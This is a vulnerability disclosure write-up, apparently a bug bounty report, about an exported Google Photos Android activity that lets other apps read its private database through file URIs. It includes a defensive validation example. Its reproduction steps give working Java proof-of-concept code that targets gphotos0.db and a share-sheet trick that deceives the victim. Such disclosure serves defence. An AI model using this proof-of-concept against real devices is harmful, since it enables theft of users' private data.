Google Photos : Theft of Database & Arbitrary Files Android Vulnerability

The Google Photos Android app's activity com.google.android.apps.photos.pager.HostPhotoPagerActivity is exported, and its intent filter supports the file scheme. This means a third-party app can use the exported activity to pass it a file via a file URI without any access validation.
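The root cause is that the exported activity opens whatever URI it is handed. As an added example (not Google Photos code), the activity below shows the validation a viewer activity can apply before touching the data: it refuses file:// URIs outright and refuses content URIs whose authority belongs to the app itself, so a caller cannot route the app's own storage back at it. The class name SafeViewerActivity and the authority heuristic are assumptions of this example.

```java
// Added example, not from the original report: an exported viewer activity that
// validates the incoming Intent before opening the referenced media.
import android.app.Activity;
import android.content.ContentResolver;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.util.Log;
import java.io.IOException;
import java.io.InputStream;

public class SafeViewerActivity extends Activity {
    private static final String TAG = "SafeViewer"; // hypothetical log tag

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        Intent intent = getIntent();
        Uri uri = intent != null ? intent.getData() : null;
        if (!isSafeToOpen(uri)) {
            // Log and bail out instead of rendering (or sharing) the file.
            Log.w(TAG, "Rejected untrusted URI from a calling app");
            finish();
            return;
        }
        try (InputStream in = getContentResolver().openInputStream(uri)) {
            // Only now is it acceptable to decode and display the media from `in`.
        } catch (IOException e) {
            finish();
        }
    }

    /** True only for content:// URIs that cannot point back into this app's sandbox. */
    boolean isSafeToOpen(Uri uri) {
        if (uri == null) {
            return false;
        }
        // 1. Never dereference a raw file path supplied by another app; a file:// URI to
        //    /data/data/<our package>/... would be read with our own sandbox permissions.
        if (!ContentResolver.SCHEME_CONTENT.equals(uri.getScheme())) {
            return false;
        }
        // 2. Refuse content URIs served by one of our own providers (assumed here to be
        //    named "<package>..."), so a caller cannot use our FileProvider as a proxy
        //    to our private files.
        String authority = uri.getAuthority();
        return authority != null && !authority.startsWith(getPackageName());
    }
}
```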


Impact :

  1. This could have allowed an attacker to steal sensitive info, including the Google Photos database and other sandbox files.
  2. This could cause a DoS of the conversation module of Google Photos, resulting in permanent denial of service.

App Detail:

Vulnerable version: ≤ 5.33.0.362978573
Patched version: 5.36.0.365895365
Installs: 5 Billion +

Steps to reproduce :

  1. Compile and run an apk that fires the intent below:

import android.content.Intent;
import android.net.Uri;
import android.os.StrictMode;
import android.widget.Toast;

// Relax the VM policy so a file:// URI can be placed in an Intent without a FileUriExposedException.
StrictMode.VmPolicy.Builder builder = new StrictMode.VmPolicy.Builder();
StrictMode.setVmPolicy(builder.build());

// The Google Photos database inside the app's private sandbox.
Uri uri = Uri.parse("file:///data/data/com.google.android.apps.photos/databases/gphotos0.db");

// Address the exported activity directly and hand it the file URI typed as an image.
Intent intent = new Intent("android.intent.action.SEND");
intent.setClassName("com.google.android.apps.photos", "com.google.android.apps.photos.pager.HostPhotoPagerActivity");
intent.setDataAndType(uri, "image/*");
startActivity(intent);

Toast.makeText(this, "Click On Share and Select iPhotos", Toast.LENGTH_LONG).show();

2. When the apk runs, Google Photos shows a media preview of the file, and the attacker's app displays the toast (Click On Share and Select iPhotos).

3. In the SHARE TO APPS bottom sheet, select More; the attacker's app (iPhotos) appears there (using an android:label="aaaaaaa" kind of trick in the intent-filter, an app can be prioritized in the share sheet).

4. After the app is selected, the database is sent to the attacker's app (it includes remote media, envelopes, backup, local media and other information).

Alternatively, if the victim chooses email, the file is attached as image.jpg (Google Photos renames any file, whatever its extension, to image.jpg), so the victim has no reason to suspect the attachment because of its file name.


Other impact :

Google Photos conversations offer an option to share a file with Google contacts. If the victim selects a contact, the app crashes with the exception “lsy: java.lang.IllegalArgumentException: baseUrl is not a fife Url” and the complete conversation module goes into permanent denial of service (DoS).


Timeline :

Mar 20, 2021 : Created issue ticket

Mar 23, 2021: 🎉 Nice catch!

Apr 2, 2021: Reward of $ 1337


Proof of concept :

Watch in 750P for better visibility